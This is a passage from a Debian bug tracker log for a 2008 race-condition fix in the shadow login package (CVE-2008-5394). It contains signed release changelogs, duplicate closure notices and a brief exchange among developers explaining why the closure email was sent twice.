fix, I do not think it's that serious to be a DSA. Still, thanks for your 
help in analysing these issues - I hope Nicolas will pick up on this for a 
future release of shadow.


cheers,
Thijs
[Message part 2 (application/pgp-signature, inline)]

Reply sent to Nicolas FRANCOIS (Nekral) <nicolas.francois@centraliens.net>:
You have taken responsibility. (Mon, 26 Jan 2009 14:24:07 GMT) Full text and rfc822 format available.

Notification sent to Paul Szabo <psz@maths.usyd.edu.au>:
Bug acknowledged by developer. (Mon, 26 Jan 2009 14:24:07 GMT) Full text and rfc822 format available.

Message #200 received at 505271-close@bugs.debian.org (full text, mbox):

From: Nicolas FRANCOIS (Nekral) <nicolas.francois@centraliens.net>
To: 505271-close@bugs.debian.org
Subject: Bug#505271: fixed in shadow 1:4.0.18.1-7+etch1
Date: Mon, 26 Jan 2009 13:52:48 +0000
Source: shadow
Source-Version: 1:4.0.18.1-7+etch1

We believe that the bug you reported is fixed in the latest version of
shadow, which is due to be installed in the Debian FTP archive:

login_4.0.18.1-7+etch1_i386.deb
  to pool/main/s/shadow/login_4.0.18.1-7+etch1_i386.deb
passwd_4.0.18.1-7+etch1_i386.deb
  to pool/main/s/shadow/passwd_4.0.18.1-7+etch1_i386.deb
shadow_4.0.18.1-7+etch1.diff.gz
  to pool/main/s/shadow/shadow_4.0.18.1-7+etch1.diff.gz
shadow_4.0.18.1-7+etch1.dsc
  to pool/main/s/shadow/shadow_4.0.18.1-7+etch1.dsc



A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 505271@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Nicolas FRANCOIS (Nekral) <nicolas.francois@centraliens.net> (supplier of updated shadow package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@debian.org)


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Format: 1.7
Date: Sat, 22 Nov 2008 16:04:04 +0000
Source: shadow
Binary: login passwd
Architecture: source i386
Version: 1:4.0.18.1-7+etch1
Distribution: stable-security
Urgency: high
Maintainer: Shadow package maintainers <pkg-shadow-devel@lists.alioth.debian.org>
Changed-By: Nicolas FRANCOIS (Nekral) <nicolas.francois@centraliens.net>
Description: 
 login      - system login tools
 passwd     - change and administer password and group data
Closes: 505271
Changes: 
 shadow (1:4.0.18.1-7+etch1) stable-security; urgency=high
 .
   * The "Curé nantais" release
   * debian/patches/303_login_symlink_attack: Fix a race condition that could
     lead to gaining ownership or changing mode of arbitrary files.
     Closes: #505271
     [CVE-2008-5394]
Files: 
 ec01ac54e482ea552fdae5753d6c1745 1406 admin required shadow_4.0.18.1-7+etch1.dsc
 3f54eaa3a35e7c559f4def92e9957581 2354234 admin required shadow_4.0.18.1.orig.tar.gz
 b78d9d738765da65a6b55dea102569c3 297817 admin required shadow_4.0.18.1-7+etch1.diff.gz
 82c630b2f4e18217170a73a2dab27cba 792460 admin required passwd_4.0.18.1-7+etch1_i386.deb
 439cd50477db064cdf11d9b48c0e9af0 796578 admin required login_4.0.18.1-7+etch1_i386.deb

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)

iQEVAwUBSW3rfWz0hbPcukPfAQIexQf/cUd2fZ9UooLPR830+AeYtPMC3p74736z
kYcWf/SUegGntDtylsrzTw1GWRfi5TZV8kdgBA+CPxoY0JHJlWnaUFyqwQxUR+Ux
os2crtjnjE/IT1n/+cUqLdVujwNk3LEX67W1Z1+RDcrPUTbyfRyRvTgUrLKVCZuP
PaNCMHV2Z3pqjvDrIznkWfzpp0IPeMP37hTlr4sBt+QFm8JugGyxT0tiVatEFzMf
UT9F10+Fpa6IrWHtdaSnpDlfTa31v4km07t1i/3OcobZVd/h3vsbIz+azBmlo/ar
59IfvmDhS6tM7WhFngCt/1tu50B0orFhiF8smRczhIuJx7iVy5nPeA==
=+TJJ
-----END PGP SIGNATURE-----





Reply sent to Nicolas FRANCOIS (Nekral) <nicolas.francois@centraliens.net>:
You have taken responsibility. (Mon, 09 Feb 2009 21:51:08 GMT) Full text and rfc822 format available.

Notification sent to Paul Szabo <psz@maths.usyd.edu.au>:
Bug acknowledged by developer. (Mon, 09 Feb 2009 21:51:08 GMT) Full text and rfc822 format available.

Message #205 received at 505271-close@bugs.debian.org (full text, mbox):

From: Nicolas FRANCOIS (Nekral) <nicolas.francois@centraliens.net>
To: 505271-close@bugs.debian.org
Subject: Bug#505271: fixed in shadow 1:4.0.18.1-7+etch1
Date: Mon, 09 Feb 2009 21:35:51 +0000
Source: shadow
Source-Version: 1:4.0.18.1-7+etch1

We believe that the bug you reported is fixed in the latest version of
shadow, which is due to be installed in the Debian FTP archive:

login_4.0.18.1-7+etch1_i386.deb
  to pool/main/s/shadow/login_4.0.18.1-7+etch1_i386.deb
passwd_4.0.18.1-7+etch1_i386.deb
  to pool/main/s/shadow/passwd_4.0.18.1-7+etch1_i386.deb
shadow_4.0.18.1-7+etch1.diff.gz
  to pool/main/s/shadow/shadow_4.0.18.1-7+etch1.diff.gz
shadow_4.0.18.1-7+etch1.dsc
  to pool/main/s/shadow/shadow_4.0.18.1-7+etch1.dsc



A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 505271@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Nicolas FRANCOIS (Nekral) <nicolas.francois@centraliens.net> (supplier of updated shadow package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@debian.org)


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Format: 1.7
Date: Sat, 22 Nov 2008 16:04:04 +0000
Source: shadow
Binary: login passwd
Architecture: source i386
Version: 1:4.0.18.1-7+etch1
Distribution: stable-security
Urgency: high
Maintainer: Shadow package maintainers <pkg-shadow-devel@lists.alioth.debian.org>
Changed-By: Nicolas FRANCOIS (Nekral) <nicolas.francois@centraliens.net>
Description: 
 login      - system login tools
 passwd     - change and administer password and group data
Closes: 505271
Changes: 
 shadow (1:4.0.18.1-7+etch1) stable-security; urgency=high
 .
   * The "Curé nantais" release
   * debian/patches/303_login_symlink_attack: Fix a race condition that could
     lead to gaining ownership or changing mode of arbitrary files.
     Closes: #505271
     [CVE-2008-5394]
Files: 
 ec01ac54e482ea552fdae5753d6c1745 1406 admin required shadow_4.0.18.1-7+etch1.dsc
 3f54eaa3a35e7c559f4def92e9957581 2354234 admin required shadow_4.0.18.1.orig.tar.gz
 b78d9d738765da65a6b55dea102569c3 297817 admin required shadow_4.0.18.1-7+etch1.diff.gz
 82c630b2f4e18217170a73a2dab27cba 792460 admin required passwd_4.0.18.1-7+etch1_i386.deb
 439cd50477db064cdf11d9b48c0e9af0 796578 admin required login_4.0.18.1-7+etch1_i386.deb

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)

iQEVAwUBSW3rfWz0hbPcukPfAQIexQf/cUd2fZ9UooLPR830+AeYtPMC3p74736z
kYcWf/SUegGntDtylsrzTw1GWRfi5TZV8kdgBA+CPxoY0JHJlWnaUFyqwQxUR+Ux
os2crtjnjE/IT1n/+cUqLdVujwNk3LEX67W1Z1+RDcrPUTbyfRyRvTgUrLKVCZuP
PaNCMHV2Z3pqjvDrIznkWfzpp0IPeMP37hTlr4sBt+QFm8JugGyxT0tiVatEFzMf
UT9F10+Fpa6IrWHtdaSnpDlfTa31v4km07t1i/3OcobZVd/h3vsbIz+azBmlo/ar
59IfvmDhS6tM7WhFngCt/1tu50B0orFhiF8smRczhIuJx7iVy5nPeA==
=+TJJ
-----END PGP SIGNATURE-----





Information forwarded to debian-bugs-dist@lists.debian.org, Shadow package maintainers <pkg-shadow-devel@lists.alioth.debian.org>:
Bug#505271; Package login. (Mon, 09 Feb 2009 22:21:04 GMT) Full text and rfc822 format available.

Acknowledgement sent to Paul Szabo <psz@maths.usyd.edu.au>:
Extra info received and forwarded to list. Copy sent to Shadow package maintainers <pkg-shadow-devel@lists.alioth.debian.org>. (Mon, 09 Feb 2009 22:21:04 GMT) Full text and rfc822 format available.

Message #210 received at 505271@bugs.debian.org (full text, mbox):

From: Paul Szabo <psz@maths.usyd.edu.au>
To: 505271@bugs.debian.org
Subject: Re: Bug#505271 closed by Nicolas FRANCOIS (Nekral) <nicolas.francois@centraliens.net> (Bug#505271: fixed in shadow 1:4.0.18.1-7+etch1)
Date: Tue, 10 Feb 2009 09:19:20 +1100
Dear Nicolas,

This latest "closed" message: is that a repeat message, a bug in some
maintenance procedures? I am sure we had 4.0.18.1-7+etch1 for a long
time now...

Cheers, Paul

Paul Szabo   psz@maths.usyd.edu.au   http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics   University of Sydney    Australia




Information forwarded to debian-bugs-dist@lists.debian.org, Shadow package maintainers <pkg-shadow-devel@lists.alioth.debian.org>:
Bug#505271; Package login. (Mon, 09 Feb 2009 22:36:03 GMT) Full text and rfc822 format available.

Acknowledgement sent to Adeodato Simó <adeodato@debian.org>:
Extra info received and forwarded to list. Copy sent to Shadow package maintainers <pkg-shadow-devel@lists.alioth.debian.org>. (Mon, 09 Feb 2009 22:36:03 GMT) Full text and rfc822 format available.

Message #215 received at 505271@bugs.debian.org (full text, mbox):

From: Adeodato Simó <adeodato@debian.org>
To: Paul Szabo <psz@maths.usyd.edu.au>, 500518@bugs.debian.org, 505271@bugs.debian.org
Subject: Re: Bug#500518: closed by Ian Beckwith <ianb@erislabs.net> (Bug#500518: fixed in linux-ftpd-ssl 0.17.18+0.3-6etch1)
Date: Mon, 9 Feb 2009 23:34:16 +0100
Dear Paul,

yes, you could say these duplicate messages are due to some
"maintenance" procedures. When bugs get fixed in the stable
distribution, they first get uploaded to a "staging area" called
proposed-updates where users can fetch them from if they are in need of
them; at that point you get the first copy of the message.

After some weeks, when we accumulate enough fixes in that staging area,
we move the fixes to the stable release itself; the software that does
the move sends at that point a second copy of the e-mail. I'm not very
sure if this is a feature of a bug, but it's just the way it is. :-)

---
> Dear Ian,
> Thanks for closing the bug! Except I got the exact same message
> on 4 Jan already, so am puzzled by this duplication.


> Dear Nicolas,
> This latest "closed" message: is that a repeat message, a bug in some
> maintenance procedures? I am sure we had 4.0.18.1-7+etch1 for a long
> time now...

-- 
Adeodato Simó                                     dato at net.com.org.es
Debian Developer                                  adeodato at debian.org
 
- Why are you whispering?
- Because I just think that no matter where she is, my mom can hear this
  conversation.
                -- Rory and Lane





Information forwarded to debian-bugs-dist@lists.debian.org, Shadow package maintainers <pkg-shadow-devel@lists.alioth.debian.org>:
Bug#505271; Package login. (Mon, 09 Feb 2009 23:57:05 GMT) Full text and rfc822 format available.

Acknowledgement sent to Nicolas François <nicolas.francois@centraliens.net>:
Extra info received and forwarded to list. Copy sent to Shadow package maintainers <pkg-shadow-devel@lists.alioth.debian.org>. (Mon, 09 Feb 2009 23:57:05 GMT) Full text and rfc822 format available.

Message #220 received at 505271@bugs.debian.org (full text, mbox):

From: Nicolas François <nicolas.francois@centraliens.net>
To: Paul Szabo <psz@maths.usyd.edu.au>, 505271@bugs.debian.org
Subject: Re: [Pkg-shadow-devel] Bug#505271: closed by Nicolas FRANCOIS (Nekral) <nicolas.francois@centraliens.net> (Bug#505271: fixed in shadow 1:4.0.18.1-7+etch1)
Date: Tue, 10 Feb 2009 00:55:50 +0100
On Tue, Feb 10, 2009 at 09:19:20AM +1100, psz@maths.usyd.edu.au wrote:
> Dear Nicolas,
> 
> This latest "closed" message: is that a repeat message, a bug in some
> maintenance procedures? I am sure we had 4.0.18.1-7+etch1 for a long
> time now...

I have no idea what triggered this second email (first closure for stable
was on 01-060)

Best Regards,
-- 
Nekral




Information forwarded to debian-bugs-dist@lists.debian.org, Shadow package maintainers <pkg-shadow-devel@lists.alioth.debian.org>:
Bug#505271; Package login. (Tue, 10 Feb 2009 00:21:02 GMT) Full text and rfc822 format available.

Acknowledgement sent to Luk Claes <luk@debian.org>:
Extra info received and forwarded to list. Copy sent to Shadow package maintainers <pkg-shadow-devel@lists.alioth.debian.org>. (Tue, 10 Feb 2009 00:21:02 GMT) Full text and rfc822 format available.

Message #225 received at 505271@bugs.debian.org (full text, mbox):

From: Luk Claes <luk@debian.org>
To: 505271@bugs.debian.org
Cc: Paul Szabo <psz@maths.usyd.edu.au>
Subject: Re: Bug#505271: [Pkg-shadow-devel] Bug#505271: closed by Nicolas FRANCOIS (Nekral) <nicolas.francois@centraliens.net> (Bug#505271: fixed in shadow 1:4.0.18.1-7+etch1)
Date: Tue, 10 Feb 2009 01:20:12 +0100
Nicolas François wrote:
> On Tue, Feb 10, 2009 at 09:19:20AM +1100, psz@maths.usyd.edu.au wrote:
>> Dear Nicolas,
>>
>> This latest "closed" message: is that a repeat message, a bug in some
>> maintenance procedures? I am sure we had 4.0.18.1-7+etch1 for a long
>> time now...
> 
> I have no idea what triggered this second email (first closure for stable
> was on 01-060)

Probably the recent stable point release from today?

Cheers

Luk




Bug archived. Request was from Debbugs Internal Request <owner@bugs.debian.org> to internal_control@bugs.debian.org. (Tue, 10 Mar 2009 07:36:08 GMT) Full text and rfc822 format available.

Send a report that this bug log contains spam.


Debian bug tracking system administrator <owner@bugs.debian.org>. Last modified: Wed Apr 23 13:50:15 2014; Machine Name: beach.debian.org

Debian Bug tracking system
Copyright (C) 1999 Darren O. Benham, 1997,2003 nCipher Corporation Ltd, 1994-97 Ian Jackson.